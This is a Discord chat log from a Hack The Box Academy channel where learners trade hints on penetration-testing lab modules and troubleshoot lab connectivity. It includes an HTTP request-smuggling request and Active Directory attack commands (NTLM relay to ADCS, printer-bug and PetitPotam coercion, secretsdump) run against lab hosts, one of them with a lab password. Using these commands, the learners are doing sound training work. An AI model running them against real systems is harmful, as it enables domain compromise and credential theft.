#modules
Don't need to click it again. Just try xfreerdp again.
You're using the pwnbox, so I take it you're not on the VPN right? You don't want to be on the VPN and have the pwnbox spawned at the same time.
Yes I am using the pwnbox. I tried again, but I do not think I have the right destination IP :
Ok, I spawned the pwnbox too soon maybe. I will try
Ok, target =! instance
Many thanks for your help !
Target is the victim, the target you are attacking
I understand better now! I feared I had to restart an instance. Ahaha
Hello everybody, I am currently on the exercise "Exploitation of PDF Generation Vulnerabilities". I am stuck on the exercises. I found the port for SSRF (8080), but I tried to enumerate without result. If someone has a hint, thanks.
Can anyone help me with this ?
Hack the Box's Academy platform has this. The pentester's path, or bug bounty, etc, depending on what you're trying to learn.
Thank you
First Request
GET /404 HTTP/1.1
Host: ip:port
Content-Length: 4
Transfer-Encoding: testchunked
31
GET /admin HTTP/1.1
Host: ip:port
0
- Request
GET /404 HTTP/1.1
Host: 94.237.61.242:33849
Can anyone help with the TE.CL question? Where exactly am I making a mistake in the requests? I detected the TE.CL vulnerability, but I cannot go to the admin address
So I am working on the new module "Active Directory Hardening - Recon & Initial Access". At the end of the section "Other Common Initial Access Weaknesses" I have tried every possible answer. The question is "What service running on a domain controller or other host can be potentially leveraged for an authentication coercion attack?" Can someone help me out with this please? I've finished the rest of the module.
can someone help me to connect the machine via ssh? i think it's problem on a HTB side, ovpn works fine, but i can't connect to the machine, i don't know how to fix it, maybe anyone who knows, please?
ssh: connect to host 10.129.44.142 port 22: Connection timed out
I've been having issues connecting to boxes today
i can't connect for 2 days, idk i have no enough exp to solve this problem
Maybe try a different region
I'm not sure
@blissful verge
No need to ping people specifically. Just be patient and someone might be willing to provide advice.
Make sure you understand what the question is asking, to find the service, then re-read the section and look for services it may be talking about.
I have already put in every service listed
I also put in every service running on the machine. It's not a complex question
i didn't even use the target provided, the answer is in the section if you read it
Hello everyone!
I'm trying to answer a question related to the SMB tool. It asks me to log in as the user "bob" and access a specific folder. However, the bob account requires a password. The only hint given is: "bob likes to use weak passwords."
I've tried every weak password I can think of, but I still can't log in as bob.
Unfortunately, I can't send screenshots in this group, and I don't know why it doesn't allow me.
Can anyone help?
Re-read the section carefully.
😉
tell me pls what can be wrong? when i ping target in a pwnbox it's working, but when i use my vm it absolutely not working. i can't connect via ssh
ovpn works fine
i have no clue what to do
Thanks. I didn't realize it only wanted one word
Have you solved it? Do you still need help? Write me privately.
Are you using both the Pwnbox and your VM at the same time? They share the same IP, so if you are, it's going to cause network issues like you described.
ye, but earlier i've tried to connect only using VM and nothing helped me
Decide to use the Pwnbox or your VM. Do not use both at the same time. Reboot your PC. After rebooting re-download the VPN file if you want to use your VM (choose TCP for a better experience.) Press CTRL+SHIFT+R on the page you're on to hard refresh it. From there spawn the target. If you want to use Pwnbox spawn it, otherwise connect to the VPN. Allow 3-5 mins for the target to fully spawn, then try again.
i feel it not gonna solve the issue but i'll try
rebooting the pc is probably not necessary but it can help if something messed up with your windows network stack and/or your vm's connection with it.
if that still doesn't work, try changing regions with the vpn. make sure to fully shut down the target and hard-refresh the page before after you download the new file, then power them up and connect.
okay
changed vpn region. hard refreshed page
if it's still not working then probably have to reach out to support on the website. everything i mentioned should have fixed it unless you have a misconfiguration somewhere.
or just use the pwnbox, should work.
os is 3-4 days, i don't think i've messed somewhere in filesystem. so seems to be support is the only way
can your vm reach websites and stuff?
alright then yeah i'm out of ideas
maybe i should use another distro
i use vmware workstation for my hypervisor
i doubt it, it's rare but it happens. usually a lot more people speak up when there are issues.
Welcome to the HTB Status Page
hmm
so sad
interesting part of it is that i've successfully connected to vpn, but can't connect to machine
also i've never written sudo apt update
module/19/section/101 Are we looking for the OS of the attacking machine or the target? Can someone explain why the answer is what it is for this section? I didn't understand the hint for this section, but guessed it right.
Better to just say the module and section
can it be that htb blocks my ip?
Highly doubt it, you're using the VPN IP. Contact support on the website.
currently stuck in the Medium Footprinting lab. I found the creds to the ||SQL DB|| but can't login. The error is as follows ||A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (.Net SqlClient Data Provider)||
try logging in ||as admin||
I'm stuck on Windows Lateral Movement - WinRm module trying to connect to DC01 as Leonvqz. I've got a RDP session on SRV02 with leonvqz and despite everything, I can't read the damn flag.txt. Hints welcome 😉.
For Network Enumeration with Nmap, Host Discovery, Are we looking for the OS of the attacking machine or the target? Can someone explain why the answer is what it is for this section? I didn't understand the hint for this section, but guessed it right.
You're looking for the OS of the target system. And if you've done the Intro to Network Traffic Analysis, there's a part of packets you can use to guess the target OS.
Thanks, that's what I thought, just wasn't completely sure about it.
@obtuse cove This server is for discussion of the various HTB platforms. This channel specifically for modules in Academy. Please read the #rules.
Anyone else having fun with File Transfers module?
Im in this module now
You have too many ways to transfer files
Is an interesting module
module: linux fundamentals
page: system information
question: “what is the path to htb-student’s mail?”
and im kinda dumbfounded
look at the env
Ohhhhhhhhhhhhhhh thanks
module: Intro to Assembly
page: shellcoding tools
question: Why do you need to provide argv to the /bin/sh as another argument?
Wouldn't be like trying to run "sh /bin/sh" (which does not even work for me when I try to execute it)
thanks!
nice
Hello, I tried the enumeration and stuff and I continue to be stuck. I did a lot of enumeration as SSRF. If someone has a hint, thanks.
I read the PHP files with LFI and the Apache configuration file and found that port 8080 redirects to 8000 internally, but no more information, if someone has a hint. I also used sec api list for rest action
Hello, I am currently doing the Password Attacks Skills Assessment and I am stuck in DMZ01. I have managed to get the credentials of the first user, but I am not able to pivot to the other target hosts. I have found another user in DMZ01 that seems significant, but I'm not able to proceed with that attack vector. May I have a hint on how to proceed?
dm me the user u have access to
hello
hey, i checked and the account ||sccm has generic all over system management||, but i`m not sure how to exploit this..
does anyone know if it's correct that the vpn reconnects every few minutes? after the phrase sequence completed?
If you’re on the last flag of the SA, you just have to check the privileges for the accounts you have
yes, i have pwned the ||SCCM machine, i have the hash of the administrator, and SCCM also the password of sqlservice, saw that genericall but not sure how to go forward||
does it break your connection or what?
i can't even connect to machine
Am a new learner
dm me of ss of your terminal of the error
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@wet cliff^
@dapper moth can i dm u?
Sure
I want to be a pro hacker
whomever doing the Drupal - Discovery & Enumeration section in the HTB Academy Attacking Common Applications Module https://academy.hackthebox.com/module/113/section/1089, can now use droopescan where I submitted a PR fix at https://github.com/SamJoan/droopescan/pull/80
@wet cliff
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I click the link but don't know how to use it
Hi, has anyone completed Skills Assessment 2 of Windows Evasion? I can get a reverse shell when calling the VBS from Dev box or in the target box when calling the script from whitelisted directory. However, putting the script on the directory of the assessment, the log only shows timeout messages. Anyone available for directions on what I need to check in my payload?
I need to pay before I learn?
@prisma wing don't spoil things for modules above tier 0
Oh my bad! Can i dm you? or shall, i raise a ticket?
- My Dms aren't open
- it's likely not an issue with the environment so support won't help
Alright then I'll just keep resetting until it works then, thanks for nothing i suppose
my only general suggestion is to try a different pivoting tool if the one you're using only works "50% of the time"
Can I get a hint for PW Attacks Skill Assessment? I can't grab initial foothold. I can't figure out username. Tried plenty of different combos, not sure if I'm missing something.
Use the tool covered in the Attacking Active Directory and NTDS.dit section.
tail -4 /etc/proxychains.conf
tail: cannot open '/etc/proxychains.conf' for reading: No such file or directory
Pivoting, Tunneling, and Port Forwarding: if there is no such file, what are we supposed to modify?
hello yall does the secure coding 101 discuss postmessage stuff
I suppose
@dapper moth is the only person I know who did it, they can tell us better.
Due to the Module review? 😂
Guys if someone has completed Pivoting, Tunneling, and Port Forwarding please tell me cause I am really stuck
I understand how it is working but it is not working for me on target machine
Hi folks
The target is not spawning, it spins and spins then gets back to Click here to spawn the target https://academy.hackthebox.com/module/177/section/1766
Can you look into it please ?
Have you tried reloading the page?
yes and logout/login
probably the bug in their system
what can i do
Please reach out to support
Done thanks
they do not monitor this channel ?
@viscid epoch u have the same problem as me?
sounds like yes, even though the status page says all is operational https://status.hackthebox.com/
ok, I have created a ticket as well
I face the same problem
Hey there. I'm having the same issue as the above
Yes, lol.
No, the support is not active on Discord
Have a look here #faq
for reaching to support go directly on site
proxychains4
why does this guy have 1 point when he owns a lot of machines?
Dude do you speak English?
targets are still unavailable as I see ?!
Thank you Nuts
proxychains4 doesn't exist either
Are you using your own vm or the attackbox? Did you install proxychains? A lot more information is needed to assist here
shoot me a dm Ill try to assist ^
Hi all box name Nibbles - Initial Foothold, on PT path, getting started
I don't see the upload button when I browse
I should see a button like that,
and upload php file to get access. But all I see is that
I need help with the Active Directory lab part 1. I have no idea what I'm doing 😭 I don't know how to get to the AD to add and remove users. HELP 🙏🏽
Is something wrong with the way I wrote the IP and PORT please?
sorry
this one
It's ok, thanks, I got the flag
Hey, I’m stuck on the Pass the Certificate lab. I have creds for user wwhite and know the CA machine, but:
No web enrollment on CA
Can’t find a cert template that wwhite can enroll for (tried User and SubCA)
Certipy requests fail with RPC errors (like “Failed to get dynamic TCP endpoint for CertSvc”)
Not sure how to confirm cert enrollment permissions or fix the RPC issue
Anyone done this lab or have tips on requesting certs when web enrollment is disabled? Thanks!
anyone with an idea here
If you are enumerating the CA and receiving errors, I would just restart the targets and once they come online (IP addresses assigned to each target), I would then let them sit for a few minutes just to ensure they have fully spun up and configured correctly.
Thanks gotta try that
I'm on pass the certificate. I'm struggling to get the inbound connection to work properly. I had to run the http port on 8080 as it kept telling me 80 was already in use and when i took everything running on 80 offline the box closed. The screenshots are from commands given
impacket-ntlmrelayx -t http://10.129.234.174/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication --http-port 8080
This is whats running on the left terminal
It just continues running new SMBD threads that receive connection but dont go anywhere
use sudo
still receiving [*] Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[] Attempting to trigger authentication via rprn RPC at 10.129.234.174
[] Bind OK
[] Got handle
The NETBIOS connection with the remote host timed out.
[] Triggered RPC backconnect, this may or may not have worked
[-] An unhandled exception has occured. Trying next host:
[-] Error occurs while reading from remote(104)
from the one running the printer script
Try PetitPotam for example: nxc smb <ip> -u '' -p '' -M coerce_plus -o METHOD=PetitPotam LISTENER=<AttackerIP>
Wait, what IP is the CA and what IP is the DC?
10.129.234.174 DC
10.129.215.139 CA
I may be trying the wrong one you're right
let me look through it again
haha sorry i didnt realize there was two
i think it's still not working
i used the DC on the printerbug
python3 printer.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 10.10.15.197
and I used the CA on the other one
sudo impacket-ntlmrelayx -t http://10.129.234.139/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication --http-port 8080
this time it took longer to give a error and created like 15 threads but nothing came of it still
That should have worked from what I can see, try to reset the machine and try again
will do
still nothing :/ also tried it without sudo & restarted the target
trying it without 8080 port gives address in use still also
Guys please help, what is the sudo password ?
I follow the module and they dont mention anything about password
try chmod +x linenum.sh
prior to running it
ohhh thanks right I forgot
send me a pm @tropic wind
im having an issue on the using crackmapexec modules, popular modules, question What's the password you found in the KeePass database file? , the command will not extract the password for some reason any ideas?
if you've already previously cracked it use --show
Now I add the Monitor.sh and I need to run it with sudo, cause the LinEnum scan shows I can do it, but it still asks me for a password
please help
I am on starting point - Nibbles Privilege Escalation
Need to do "sudo monitor.sh"
ask me what is Nibbler password
start simple, see what you can do with sudo without a password first.
I start and saw I can run the Monitor.sh based on the LinEnum.sh scan
Some finished skill assessment 2 of windows evasion i need some guidance
Okay, so if you read over the section, have you tried exploiting it as it shows?
yes I just do "sudo monitor.sh"
but it ask me for password
That's not what the example shows.
I dont understand
Re-read the example, look at the commands it provides to exploit monitor.sh. If you CTRL+F "sudo monitor.sh" nothing comes up, so you aren't doing the command as shown.
because the full path?
idk, try it
i'm still struggling on pass the certificate.
sudo impacket-secretsdump -k -no-pass -dc-ip 10.129.198.230 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
I've also tried it without sudo
ask password
You still aren't doing what the section showed you. You added a $ to the path for some reason.
hey did you manage to solve it
no
I'm sorry, you're right. I tried now without the $
guyz can u help me i have a usb drive that's a bit old and is has some data and i want to format it but it's write protected how to remove that thing I've tried some tutorial from youtube but it's not working for me
Now he said "I need something more specific"
i'm kinda stuck at it too
Your command executed the script as intended. The script has something in it causing those errors.
i figured out the step, dms
Its not that its using keepass
Check to see if you can use the certificate (.pfx) with netexec.
i got it to work by adding it to /etc/hosts
Is nothing being triggered?
No it says waiting for master password to be entered then nothing
You can DM the command you used.
Still having issues with the CA or were you able to get past it?
it's all about the learning process, and i bet you learned something
that's a W
also, it is not an easy path
you will struggle
in the pass the hash section of password attacks, im stuck on reading the file share. I have passed the hash and logged in as david but they keep telling me i cannot access the share
can you show the screenshot please
that will make it more clear for everyone
Make sure not to spoil content from modules above tier 0
don't seem to be able to send screenshots
You need to identify your account by following the rules in #welcome and also may need a certain rank but I'm not sure about that
regardless that module is above tier 0 so best not to post anyway
yea alright
its just a generic windows pop up anw
i'm just confused why im logged in as the appropriate user but i can't access the share
Am I missing something to get to Administrator? The instructions stop at jpinkman so am I meant to just try to priv esc to Administrator now?
The section mentions that user being in a specific group.
Does it have to do with cracking the hash given earlier im guessing ?
hey
No cracking necessary. It's discussed and shown in the part just above the last paragraph titled No PKINIT?
thanks i'll check it out again
Your words important for me, thanks for that
So I see it mentions that jpinkman is in Remote Management, I connected via evil-winrm to jpinkman and got the .txt in desktop, but i'm still struggling to understand how i'm meant to connecto administrator from that. I tried switching back my .ccache file but the earlier one is a machine file not a user so it can't be used
I don't believe snaffler or mimikatz is pre installed and the winrm shell seems unstable so I don't think thats the proper approach either to go about installing them
Ah, so you are on Q2? For some reason I thought you already did Q2.
Earlier didn't you perform an attack that got you a DC cert?
Yes i got the .pfx file and a dc.ccache file but exporting the .ccache file wont allow me to connect because its a machine not a actual user, maybe i could use the .pfx file but i need to figure out how to use it for administrator
You can DM if you'd like.
Hi guys i need some help
With what? You need to explain before people can help.
I didn't tell you to DM me.
Well i did
can anyone help
What you messaged me is wildly against the rules...
You can use impacket-secretsdump
Ok
Yea I had done that earlier, I had forgot about it i'm gonna attempt to PtH
Please read the #rules and do not DM people randomly.
Ofc i will
For Windows Lateral Movement Skill Assessment--Any Hints on What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt? I have Proxychains set up and can connect to the VNC however its just blank to me. no window pops up
Been stuck on this for 4 days. any nudges be appreciated to finish it.
Best to include the module and section you're on
Hey guys, can you please help me with following question: i have pivot host and active directory internal network that is reachable through this pivot host. I want to use bloodhound python for the DC inside this internal network but i constantly get DNS error. How can i tunnel all DNS packets in correct way? I tried SOCKS5 dynamic port forwarding and sshuttle but it throws DNS errors at me if i try to launch bloodhound-python
Is there an easy way to see all completed modules, in list format? 😄
Found the "owned modules", but hard to get a grasp with all the massive images
Module: HTTPs/TLS Attacks
Section: Padding Oracles
In the prevention paragraph, the link to "Never Roll-Your-Own Crypto" seems to be not working on my end. Is it only me or the link is broken?
Share the link, I'll try? 😄
Nope 404 for me as well
Same 😛
Didn't use browser to check
Haaang on says my hosts doesn't resolve, is it a vHost you forgot?
You can DM what you know and have tried.
Anyone know a good way to learn how to use AD? I am totally new to the field and have no idea what I'm doing to complete the Advanced Directory lab
10 cubes, so one of the cheap ones 😄
That's the one I'm on, I'm stuck on the lab part towards the end. I don't know how to get to the AD to start adding users.
Sorry haven't done it yet, but on my todo 😄
I'm on the pentest job path currently, so gotta get some AD in before the cert.
Good luck to you
https://academy.hackthebox.com/module/147/section/1356
I'm currently struggling with where to go. I created a username file and attempted to bruteforce all ssh/ftp sessions using given password and the user file i made with no success. I managed to get a antak webshell on one of the IP's but I'm kind of unsure how to go about it from here and I can't figure out how to pivot using this.
Did you use any of the methods covered in the Attacking Active Directory & NTDS.dit section to create a username list?
So... You have a potential password and an employee name, but not a username, what do you need to do?
I created a rule to generate a wordlist
or i just used the prexisting best64 list but It may be a better idea to try to make my own
I'd revisit the section I mentioned.
Will do
You already have a potential password; no need to try to generate more passwords until you try that one. You are just missing a valid username.
I know I tried to generate a username file though
I'll revisit the section and see what comes up
What it means if /proc/self/environ outputs just 4 characters "l www", im trying lfi/rfi
Is getting someone’s ip illegal
It depends
But if you ask like that, then pretty sure yes
What's that got to do with a module?
I typed on the wrong area
There’s this guy that is prank calling me non stop
Ok thank you
pls hint
not the full answer pls
i've tried check var and found mail but it didnt work
MAIL=/path/to/mail
i think there is a problem with this task, cuz in /var/mail there wasn't htb-student
....
Which module and section?
copy/paste from the env itself
is it bad?
environment variables can contain paths that aren't on the system
from the environment variable for MAIL
JUST COPY/PASTE THAT
you don't have to navigate/confirm it exists
Yes
Hey MarcieLee, mind if I DM you a question thats kind of related to your mentorship but not in the realm of being able to freely dm you about it without asking?
Go for it
anyone available that can help me on the last part of the advanced sql injection skills assessment? trying to get my RCE script to work but can't see why its not working
Yo, I'm quite new to programming and I want to make a cheat for fishing planet, but I have no idea where to start
Read the #rules and follow the instructions in #welcome then you can access other channels that are better to answer this question like #programming. This channel is only for discussion of the various modules on Academy.
My Bad sorry
Hi all, I have a question on CAPE Windows Lateral Movement
Windows Remote Management (WinRM) I am working on the question Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt
I solved this not in the intended way and would like to know the intended path, I can DM, thanks
Hello, could someone please help me with the last point of the last part of the DACL I module. Thanks.
The skills assessment?
This link right here got me over the finish line. Thank you
Hey guys I am kind of stuck on NSE Script section of the Network Enumeration with Nmap. Ive tried looking for vulnerabilities with the web server and outputting to a file and searching for it but for some reason I cant seem to find the flag. I also tried the other categories for the scripts and nothing.
Any help is appreciated
what is the question
Nevermind I figured it out. But thanks @solid mirage
I'm 4 hours and 6 blogs deep in the dns footprinting and I'm going crazy, i don't want to spoil it here, but if someone can help me i can give the context in the dm. PLSSSS
whats the issue?
hey guys, I'm sorry to be a pain but I am so confused! I started the linux fundamentals course yesterday and I do not understand why the questions at the end are unrelated to the content I am learning. I am in the Filter contents section and have not been introduced to cURL. The only time I have heard it is in the section Files and Directories where it says: Which
One of the common tools is which. This tool returns the path to the file or link that should be executed. This allows us to determine if specific programs, like cURL, netcat, wget, python, gcc, are available on the operating system. Let us use it to search for Python in our interactive instance.
and Getting Help where it says: Some tools or commands like curl provide a short version of help by using -h instead of --help:
Does anyone know why this is, as I am finding it quite frustrating to complete the questions when they go in random orders that seem to not make sense. Any help would be greatly appreciated thanks!
Everything you need is in the module
which machine in X-HTB machine is recommended for web-requests to practice, or is web-requests enough? kindly, anyone? this is a starter
Hi, i have problem with Skills Assessment - Hacking WordPress - https://academy.hackthebox.com/module/17/section/64
I have got the admin pass, and logged in to edit 404.php, but get error:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP
I think it's the permission problem, but how to solve this?
htb modules are like that (which makes u go google stuff and learn some new things / techniques on your own) and learning new things is frustrating to everyone coz we hit walls several times when we do something we dont know or we learn something new. i hope you got the answer ;v
what modules should you complete to start off as a beginner? (academy) or should you choose a path instead?
Hi guys, I am using Ligolo pivoting in the "Skills Assessment - Password Attacks" module, but I can only ping DC01 and cannot ping JUMP01 or FILE01.
Is it a bug?
Without having done it yet, is it pivoting maybe? 😄
https://academy.hackthebox.com/paths
There's a few basic ones to get you started 😄
Look for medium or easy, alternatively consider Fundamentals on https://academy.hackthebox.com/modules
Not every machine responds to a ping. I don't know whether this should be the case in this lab
emmm...probably not. I use ligolo many times, this is the first time I can't ping every machine in internal network.
Or still can solve this module with this issue?
This has nothing to do with ligolo, but with the configuration of the machine. As I said, I don't know the revised module and therefore don't know whether the machine should respond to a ping or not.
can anyone give a hint? thank you
Hi there, I finished the gpo section of the module DACL-2. But I did it with the windows approach. I am running into some issues with the linux approach. Is somebody open for a discussion about it?
If so just send me a dm.
I am super stuck on https://academy.hackthebox.com/module/113/section/2164
I try the SQL injection and it doesnt work, im also not able to get the file download for fatty-client.jar, this module is super frustrating me haha
i solved and slept, thank you for trying to help
Morning/Evening all, I'm running into an issue on "Azure Enumeration" for the Active Directory Bloodhound section. When attempting to run "TheEdgeMaker.ps1" script I get no prompt for my Azure login. However, I get an error stating authentication failed. Seems like some session is still cached? Any solutions? Many thanks!
https://academy.hackthebox.com/module/69/section/2070
Hello, I am currently doing the Password Attacks Skills Assessment and I am stuck in DMZ01. I have managed to get the credentials of the first user, but I am not able to pivot to the other target hosts. I have found another user in DMZ01 that seems significant, but I'm not able to proceed with that attack vector. May I have a hint on how to proceed?
no way other than pivoting
Hi, I'm on AD Enum & Attack Module Skill Assessment 1. I found a credential to get into MS01, I already set up ligolo so that I can ping MS01 from my kali, but rdp is still not working. Any suggestion on how to work around it?
in the new Active Directory Hardening - Recon & Initial Access mini-module the answer to skill assessment question Remediate finding 5: Weak Active Directory Password Policy should be reviewed...
i'm surprised you unmuted yourself
got fixed :(
unfortunate
i think you should provide more detail in /feedback
if you havent already
help me
with what
i have an error with identify
nah, not yet finished - but stumbled across this question as the accepted answer is neither based on ms best practices, nor nist, nor anything from the module^^ (cc @blissful verge )
help me plss
ah
i see
@gray yacht Yes, brother, the last part, the last point. I already have the others, but I'm just missing the last one.
You can DM.
no @boreal kelp
U can't do all modules on free tier right?
Of course, thank you
Anyone wana help me with advanced SQL skills assessment? can't see why my script isn't achieving RCE, debugged script in burp and everything seems to run correctly.
Hi, I'm on AD Enum & Attack Module Skill Assessment 1. I found a credential to get into MS01, I already set up ligolo so that I can ping MS01 from my kali, but rdp is still not working. Any suggestion on how to work around it?
Does netexec validate access via RDP to that host?
you can DM me
Can I DM you?
Sure
Nvm somehow it work now, anyway thank you
cheers dm'd you
did htb just get rid of their designer in april for AI but ran out of tokens for badge creation? no badge images for 3 months now
the AI had hallucinations
this happens to designers too - but mostly in the desert while on vacation :D
Hello, I'm currently doing the password attack skill assessment and i am stuck in DMZ01 can someone that did it DM me to help please because i can't say much here without spoilers. Please I need help im on it since yesterday and I've put like 15hours + on this without much success.
You managed to get a new user on DMZ01?
No i don't think so
But you have shell access right?
Okay, keep looking then, you are missing it. Yeah, no need for root.
Can i DM you ?
Yes
Hi guys, anyone can help me im stuck on https://academy.hackthebox.com/module/110/section/1051 ?
Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
i already found flag.txt on current path using ls -la
do you know the command that will read the flag.txt contents?
cat
so what happens when you try that one
Hi Guys I am doing Remote/Reverse Port Forwarding with SSH in Pivoting, Tunneling and Port Forwarding and there is a section on Windows upload, I am a bit stuck on this
can someone help?
I have to invoke web request but I didn't understand a bit how it is working
I have to download backupscript.exe on windows machine can I do this from compromised ubuntu server?
"other" flag, look around the system a bit more with ls
We can download this backupscript.exe on the Windows host via a web browser or the PowerShell c
how to download via a web browser?
I really don't know how to?!
The targets don't have internet access, you'd have to use techniques from the File Transfer module to transfer the file over
from my attack host right?
can anyone help with the first question on the using crackmapexec skills assessment
can anyone help me with syntax of invoke request from linux to windows?
chatgpt can be great for syntax
as long as it doesn't lie that is lol. sometimes it makes stuff up.
can i dm anyone about the password cracking module - pass the hash ?
i have some question regarding the solution
Nuts I know the syntax but didn't find how to connect my linux machine with windows machine ip
the two machines can't talk to each other? as long as the network connection is there, there are tons of ways to transfer a file
has anyone done "Cross-Site Scripting (XSS) Phishing" Module? im having major problems
many people have
such a ballache, i have tried using the vpn on my kali machine and on the pwnbox and i just cant get it done. at this point i just want the flag so i can move on
What are you exactly trying to do that's failing?
the xss, sending the link to the victim and obtaining the login details
Yes but that doesn't explain much to me, what way are you trying to attack the victim
Try using a PHP Web server that hosts the malicious file
finally, i did it! holy crap that was annoying
what was the issue?
hey guys which path is better to start with cbbh then cpts or cpts then cbbh
depends on your goals really.
cpts is a little more broad as it covers some web stuff and internal pentesting while cbbh is pretty much just web stuff
alright, thank you
Hi m why cant i send message on HTB off topic?
Read and follow #welcome
Hey, I stuck on SA 1. Could I DM you?
Hello, anyone have done the prompt injections modules?
Anyone completed the skills assessment for Android Application Static Analysis ?
I currently have access to bdavid in the skills assessment for password attacks. I found multiple .pcap files but i cant find anything in the analysis. I just wanted to see if I was missing something or if I was going down the wrong path.
i don't recall .pcap being important
Do you know if anything in the IT share is? I see a lot of .ps1 scripts but i'm not really sure where to go, I also found a USER@SERVER:0001512 hidden in a file but the port on said server is closed so idk what to do with that
it's been a minute since i did the module so you'll have to let me double check my notes
Hi guys i have a question about a module pentest in a nutshell on linux information gathering when i'm doing the scan for wordpress i don't get the theme and neither the plugin
bd* has special access to a host 😉 (mimikatz is helpful)
ill do some exploration with mimikatz i havent touched on that yet, thanks!
i've used my user/pass list on most services, i could be missing something though but i dont believe i am, my creds for bd* worked but not st*
you're a step away 😉
idk what that means 😭
i'll investigate mimikatz but if i get stuck ill try to go through nxc i guess
Hello everybody ... hope you are fine. Do you know any good books for learning web security? I first looked at something like "The Web Application Hacker’s Handbook Second Edition" but it's too old, so I would like you to give me advice please
I'd recommend using an online educational platform instead as it can be updated. Like HackTheBox's Academy. This channel, by the way, is dedicated to the discussion of those modules. This question is better asked in something like #general or #hacker-lounge. You'll need to follow the instructions in #welcome to gain access to the other channels.
damn i don't know why but using the ip address and using the the FQDN don't give the same result
probably virtual hosts.
thanks i didn't think about this since in the module they used the ip address
Hello there, Im stuck on the Password attacks skill assessment, can someone help me in DM please ?
is it inlanefreight.htb or .com
Did you try https?
Looks normal
Check open ports.
Either that or 8443.
I'm afk, but can see if it resolves when trying to navigate to them or restart the target.
am i allow for creating files and dir-s on a htb academy server for learning?
How to get the noob role
Follow the instructions in #welcome
It’s gonna reset anyway
ty
why are some of the windows VMs i've used so laggy?
did you guys find the linux fundamentals module useful for HTB stuff later?
The link in #welcome links directly to it.
Look dm
@rustic sage Please take care not to post content from modules above tier 0. The reason it's not showing hashes is because they are already captured. You'll need to look in the file they're stored in to view them or delete the file and then Responder will show them when you run it.
You simply ask in here, no need to post content though.
You can just describe your issue
but i gave you the answer you were looking for
Where did you get stuck at the moment?
in "The live engagement" in the shells and payloads module the foothold machine keeps crashing every time i RDP into it
Download additional_samples.zip from this module's resources (available at the upper right corner) and transfer the .zip file to this section's target. Unzip additional_samples.zip (password: infected) and use IDA to analyze orange.exe. Enter the registry key that it modifies for persistence as your answer. Answer format: SOFTWARE____
tried using a python server using python3 -m http.server then using wget <link> and on the VM it just refuses to download the file and its not anywhere on the system.
thanks i will try once it restarts
On your VM? You should be able to just log into HTB and download it straight there. Also idk of any VM that doesn't support copy/pasting to/from the host machine, so it should work.
I meant from the pwnbox to windows vm you rdp into.
There are many ways to file transfer, I like using the built in /drive argument with xfreerdp if I'm already RDPing into a Windows machine
flags wont allow connection to happen
Found a working solution using remmina. ||You have to configure a share folder in remmina. you do this by typing remmina then clicking on the plus sign and the rest is very straight forward from there.||
results with xfreerdp /v: /u: /p: /bpp:8 /network:modem /compression -themes -wallpaper
[19:10:34:812] [39785:39786] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[19:10:34:813] [39785:39786] [ERROR][com.freerdp.core] - failed to connect to 10.129.201.141
connection establishes with regular xfree /v/u/p but crashes soon after
Always best to say the module/section/question you're on, and please don't randomly ping people
which word list did you use?
then you probably have the wrong user or something
well if you got question 1 right then you have the user
rockyou should do it, maybe check your hash
maybe try restarting the environment or changing regions, then capture it again and try again or something
Bloodhound simply doesn't show everything. Sometimes you have to manually enumerate.
It's very useful but I view it as a crutch which doesn't show you the full picture, I prefer to use bloodyAD to build out the path slowly, backwards if I have to.
Personally I think they are both suboptimal.
This is because an ingestor causes an enormous amount of noise, and PowerView is detected by simple AV.
You should find and formulate an evasive methodology of mapping the target.
For me it's gonna be either to use .net in memory on a .net process or the native api and indirect syscalls using C...
But that's assuming you're gonna do red Teaming and not just pentesting with zero evasion
Could someone give me a nudge in "Skills Assessment - Password Attacks" ?
Really ran out of idea from jump01 to dc01.
hi I'm working through the AD Enumeration and Attacks Module and I'm done with section 11 and I am wondering how long does it take most people to work through the module? I'm making sure to get good notes on every single section so as not to rush through it.
I heard some people say it took them like two months. I've been at it for like a week or two and I'm 11 sections into it.
actually its been around 2 weeks
I don't need help with the module currently I just want to ask how long it took you to complete it. I completed pivoting, tunneling and port forwarding on June 19th and then a couple days later started AD module so its been almost 3 weeks.
the actual section exercises aren't difficult but I do a lot of note taking to make sure I understand the whole thing
the actual flags so far are not hard, tho I imagine the skills assessment will be difficult
No one can know how long it takes everyone on average. People only know how fast they completed it. It also depends on how many hours you're putting in, etc. I completed the entire path in just over 4 weeks for example, but I also worked on it like 8+ hours a day.
I've heard ranges for the entire path, but not AD. The ranges I've heard for the whole path is anywhere from 1 month to 12 months.
Frankly I don't think it matters at all, what matters is you understand the content.
I know it doesn't matter. I'm not referring to the whole path. I'm referring to the AD Enumeration and Attacks module.
which is one module in the path
No one knows. How can anyone know the average time it takes for everyone as a whole?
and the reason I'm asking is because
people say its the longest module in the CPTS path and
its one of the hardest so I am just curious. People are saying it took them two months. At the rate I'm going it will be 1.5 months for this module.
but I'm wondering does the CPTS path start to get easier after AD Enumeration and Attacks like everyone says? I know it starts to get into web hacking after that.
i don't think it was one of the hardest
well, its not too difficult to me so far
I already had vast knowledge of AD due to my IT experience
the exercises and flags have been easy. people are saying its the longest module.
it might be longest in terms of content, either that or aen i'd imagine
that's subjective
i found modules like metasploit, getting started, vuln assessment, etc to be more tedious
I mean maybe you're right. I found the pivoting, tunneling, and port forwarding module to be harder
I mean I am having an easier time getting through this module than previous ones but it's more sections to complete if you get my drift
so like for someone whose first real exposure to learning pentesting is CPTS, would you say it could be tedious?
yeah but completion rate is going to vary by people. difficulty is going to be subjective.
